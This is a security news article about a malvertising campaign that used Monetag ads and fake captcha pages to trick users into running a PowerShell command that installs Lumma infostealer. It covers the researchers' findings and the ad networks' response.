A new large-scale campaign distributing Lumma infostealer malware through fake captcha pages has been observed using malvertising to exploit weaknesses in the digital advertising ecosystem. The attacks exposed thousands of victims to credential theft and financial losses.
Uncovered by Guardio Labs and Infoblox researchers, the campaign relies on Monetag, a subsidiary of PropellerAds, to propagate malicious fake captcha pages. Users encounter these deceptive pages while browsing legitimate-looking websites, where they are prompted to verify their identity by completing a captcha.
However, the process executes a PowerShell command, installing malware that targets sensitive data such as social media credentials, banking information and personal files.
Key findings from the investigation include:
-
Extensive reach: Over 1 million ad impressions daily, with traffic funneled through more than 3000 websites
-
Malware delivery mechanism: Redirect chains and obfuscated scripts distribute fake captcha pages via ad networks
-
Sophisticated cloaking: Attackers used services like BeMob for ad tracking to obscure malicious intent from moderators
The Role of Ad Networks
Guardio Labs highlighted how the infrastructure of ad networks enables such campaigns. Monetag’s ad scripts deploy traffic distribution systems (TDS) to analyze visitors and optimize ad placement. These systems, designed for legitimate advertising, are exploited to deliver malicious content on a massive scale.
Malvertising campaigns like this thrive due to fragmented accountability. Ad networks, tracking services, publishers and hosting providers each play roles but often avoid responsibility. Attackers further exploit these gaps by swapping benign creatives for malicious ones after approval.
Read more about malvertising: NCSC Publishes Tips to Tackle Malvertising Threat
“This fake captcha campaign is just one example that exposes the darker side of the internet’s advertising ecosystem,” Guardio Labs warned. “While advertising is a cornerstone of the modern internet, the same ecosystem now faces a significant conflict of interest – creating a security gap that leaves users vulnerable.”
Following the disclosure, Monetag and BeMob took action, banning over 200 accounts linked to the campaign. However, researchers emphasize the need for proactive measures, such as continuous content moderation and stricter account validation, to prevent abuse.